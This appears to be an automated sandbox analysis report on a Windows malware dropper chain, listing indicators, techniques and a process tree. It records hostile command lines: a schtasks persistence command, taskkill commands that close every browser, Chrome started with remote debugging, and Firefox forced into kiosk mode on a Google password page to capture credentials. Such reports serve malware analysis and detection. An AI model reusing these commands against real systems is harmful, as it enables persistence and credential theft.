Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
5340	taskkill.exe
5764	taskkill.exe
2276	taskkill.exe
2520	taskkill.exe
2212	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4292	schtasks.exe
5896	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4124	da013399e13811ab7a5f1ea197773829.exe
4124	da013399e13811ab7a5f1ea197773829.exe
4956	skotes.exe
4956	skotes.exe
4532	jROrnzx.exe
4532	jROrnzx.exe
4532	jROrnzx.exe
4532	jROrnzx.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
1172	skotes.exe
1172	skotes.exe
4160	qFqSpAp.exe
4160	qFqSpAp.exe
4160	qFqSpAp.exe
4160	qFqSpAp.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
3740	37da4af4b8.exe
3040	48ec5f039a.exe
3040	48ec5f039a.exe
3660	5636d338cb.exe
3660	5636d338cb.exe
3552	ace2630f44.exe
3552	ace2630f44.exe
3552	ace2630f44.exe
3552	ace2630f44.exe
3552	ace2630f44.exe
3552	ace2630f44.exe
5000	b2212dd3dd.exe
5000	b2212dd3dd.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
388	powershell.exe
388	powershell.exe
388	powershell.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
4324	Bjkm5hE.exe
4324	Bjkm5hE.exe
4324	Bjkm5hE.exe
4324	Bjkm5hE.exe
1216	chrome.exe
1216	chrome.exe
1404	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
1404	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
2332	d2YQIJa.exe
2332	d2YQIJa.exe
2332	d2YQIJa.exe
2332	d2YQIJa.exe
2332	d2YQIJa.exe
2332	d2YQIJa.exe
2804	DTQCxXZ.exe
2804	DTQCxXZ.exe
2804	DTQCxXZ.exe
2804	DTQCxXZ.exe
4404	bea16bd486.exe
4404	bea16bd486.exe
1472	Ta3ZyUR.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
5804	chrome.exe
5804	chrome.exe
5804	chrome.exe
6492	msedge.exe
6492	msedge.exe
6492	msedge.exe
6492	msedge.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	5340	taskkill.exe
Token: SeDebugPrivilege	5764	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	1524	firefox.exe
Token: SeDebugPrivilege	1524	firefox.exe
Token: SeShutdownPrivilege	1216	chrome.exe
Token: SeCreatePagefilePrivilege	1216	chrome.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeShutdownPrivilege	5804	chrome.exe
Token: SeCreatePagefilePrivilege	5804	chrome.exe
Token: SeShutdownPrivilege	5804	chrome.exe
Token: SeCreatePagefilePrivilege	5804	chrome.exe
Token: SeShutdownPrivilege	5804	chrome.exe
Token: SeCreatePagefilePrivilege	5804	chrome.exe
Token: SeDebugPrivilege	824	08228ffca5.exe
Token: SeShutdownPrivilege	5804	chrome.exe
Token: SeCreatePagefilePrivilege	5804	chrome.exe
Token: SeShutdownPrivilege	5804	chrome.exe
Token: SeCreatePagefilePrivilege	5804	chrome.exe
Token: SeShutdownPrivilege	5804	chrome.exe
Token: SeCreatePagefilePrivilege	5804	chrome.exe
Token: SeShutdownPrivilege	5804	chrome.exe
Token: SeCreatePagefilePrivilege	5804	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4124	da013399e13811ab7a5f1ea197773829.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
3460	00610290ee.exe
3460	00610290ee.exe
3460	00610290ee.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
1216	chrome.exe
5804	chrome.exe

Suspicious use of SendNotifyMessage 35 IoCs

pid	Process
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
3460	00610290ee.exe
3460	00610290ee.exe
3460	00610290ee.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
1524	firefox.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe
5736	a196afcbb6.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1524	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4124 wrote to memory of 4956	4124	da013399e13811ab7a5f1ea197773829.exe	85
PID 4124 wrote to memory of 4956	4124	da013399e13811ab7a5f1ea197773829.exe	85
PID 4124 wrote to memory of 4956	4124	da013399e13811ab7a5f1ea197773829.exe	85
PID 4956 wrote to memory of 3792	4956	skotes.exe	87
PID 4956 wrote to memory of 3792	4956	skotes.exe	87
PID 4956 wrote to memory of 3792	4956	skotes.exe	87
PID 3792 wrote to memory of 5944	3792	amnew.exe	88
PID 3792 wrote to memory of 5944	3792	amnew.exe	88
PID 3792 wrote to memory of 5944	3792	amnew.exe	88
PID 4956 wrote to memory of 2012	4956	skotes.exe	89
PID 4956 wrote to memory of 2012	4956	skotes.exe	89
PID 4956 wrote to memory of 2012	4956	skotes.exe	89
PID 2012 wrote to memory of 3780	2012	jROrnzx.exe	91
PID 2012 wrote to memory of 3780	2012	jROrnzx.exe	91
PID 2012 wrote to memory of 3780	2012	jROrnzx.exe	91
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 2012 wrote to memory of 4532	2012	jROrnzx.exe	92
PID 5944 wrote to memory of 3740	5944	futors.exe	97
PID 5944 wrote to memory of 3740	5944	futors.exe	97
PID 5944 wrote to memory of 3740	5944	futors.exe	97
PID 4956 wrote to memory of 4160	4956	skotes.exe	99
PID 4956 wrote to memory of 4160	4956	skotes.exe	99
PID 4956 wrote to memory of 4160	4956	skotes.exe	99
PID 5944 wrote to memory of 3040	5944	futors.exe	101
PID 5944 wrote to memory of 3040	5944	futors.exe	101
PID 5944 wrote to memory of 3040	5944	futors.exe	101
PID 4956 wrote to memory of 3660	4956	skotes.exe	102
PID 4956 wrote to memory of 3660	4956	skotes.exe	102
PID 4956 wrote to memory of 3660	4956	skotes.exe	102
PID 4956 wrote to memory of 3552	4956	skotes.exe	103
PID 4956 wrote to memory of 3552	4956	skotes.exe	103
PID 4956 wrote to memory of 3552	4956	skotes.exe	103
PID 4956 wrote to memory of 5000	4956	skotes.exe	104
PID 4956 wrote to memory of 5000	4956	skotes.exe	104
PID 4956 wrote to memory of 5000	4956	skotes.exe	104
PID 4956 wrote to memory of 5736	4956	skotes.exe	107
PID 4956 wrote to memory of 5736	4956	skotes.exe	107
PID 4956 wrote to memory of 5736	4956	skotes.exe	107
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 5736 wrote to memory of 5340	5736	a196afcbb6.exe	109
PID 5736 wrote to memory of 5340	5736	a196afcbb6.exe	109
PID 5736 wrote to memory of 5340	5736	a196afcbb6.exe	109
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3660 wrote to memory of 3404	3660	5636d338cb.exe	111
PID 3660 wrote to memory of 3404	3660	5636d338cb.exe	111
PID 3660 wrote to memory of 3404	3660	5636d338cb.exe	111
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3040 wrote to memory of 4420	3040	48ec5f039a.exe	108
PID 3660 wrote to memory of 3404	3660	5636d338cb.exe	111
PID 3660 wrote to memory of 3404	3660	5636d338cb.exe	111
PID 3660 wrote to memory of 3404	3660	5636d338cb.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\da013399e13811ab7a5f1ea197773829.exe
"C:\Users\Admin\AppData\Local\Temp\da013399e13811ab7a5f1ea197773829.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4124
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3792
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5944
    - - C:\Users\Admin\AppData\Local\Temp\10006970101\37da4af4b8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10006970101\37da4af4b8.exe"
        5⤵
        Enumerates VirtualBox registry keys
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3740
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe55b7cc40,0x7ffe55b7cc4c,0x7ffe55b7cc58
        7⤵
        
        PID:5976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2044 /prefetch:2
        7⤵
        
        PID:3200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1924,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2080 /prefetch:3
        7⤵
        
        PID:2688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2268 /prefetch:8
        7⤵
        
        PID:4960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:1660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4508,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8
        7⤵
        
        PID:3668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4752 /prefetch:8
        7⤵
        
        PID:2324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,4799828573255713630,18347278736656257987,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4932 /prefetch:8
        7⤵
        
        PID:5904
      - C:\Users\Admin\AppData\Local\Temp\service123.exe
        
        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5860
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4292
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 1532
        6⤵
        Program crash
        
        PID:2864
    - - C:\Users\Admin\AppData\Local\Temp\10006980101\48ec5f039a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10006980101\48ec5f039a.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3040
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:4420
- - C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe
    "C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2012
  - - C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe
      "C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"
      4⤵
      Executes dropped EXE
      PID:3780
  - - C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe
      "C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 976
      4⤵
      Program crash
      PID:2308
- - C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe
    "C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4160
- - C:\Users\Admin\AppData\Local\Temp\1085410001\5636d338cb.exe
    "C:\Users\Admin\AppData\Local\Temp\1085410001\5636d338cb.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3660
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:3404
- - C:\Users\Admin\AppData\Local\Temp\1085411001\ace2630f44.exe
    "C:\Users\Admin\AppData\Local\Temp\1085411001\ace2630f44.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3552
- - C:\Users\Admin\AppData\Local\Temp\1085412001\b2212dd3dd.exe
    "C:\Users\Admin\AppData\Local\Temp\1085412001\b2212dd3dd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5000
- - C:\Users\Admin\AppData\Local\Temp\1085413001\a196afcbb6.exe
    "C:\Users\Admin\AppData\Local\Temp\1085413001\a196afcbb6.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:5736
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5340
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5764
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2276
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2520
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2212
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5244
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1524
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 27376 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d4552ca-cfdb-43fa-b253-5951c1718305} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" gpu
        6⤵
        
        PID:112
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 28296 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d4e32a6-c2c5-4c75-8994-557f2276c14b} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" socket
        6⤵
        
        PID:536
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3444 -childID 1 -isForBrowser -prefsHandle 2780 -prefMapHandle 3204 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89f9d300-102f-41fc-bcc8-3df51a5c86e1} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
        6⤵
        
        PID:3300
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3364 -childID 2 -isForBrowser -prefsHandle 3436 -prefMapHandle 3360 -prefsLen 32786 -prefMapSize 244628 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e291bde7-57d4-4476-b79f-421254f7a246} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
        6⤵
        
        PID:3860
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1036 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4696 -prefMapHandle 4652 -prefsLen 32786 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a1b8d6b-01ef-4d54-bead-91c2f64632e3} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" utility
        6⤵
        Checks processor information in registry
        
        PID:4144
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 3 -isForBrowser -prefsHandle 4552 -prefMapHandle 5424 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6fe17f6-64fd-48b8-81b3-acc7e087e14d} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
        6⤵
        
        PID:1804
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -childID 4 -isForBrowser -prefsHandle 5456 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85a0690f-e749-40ee-9322-9cc5fab0a8c6} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
        6⤵
        
        PID:2124
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
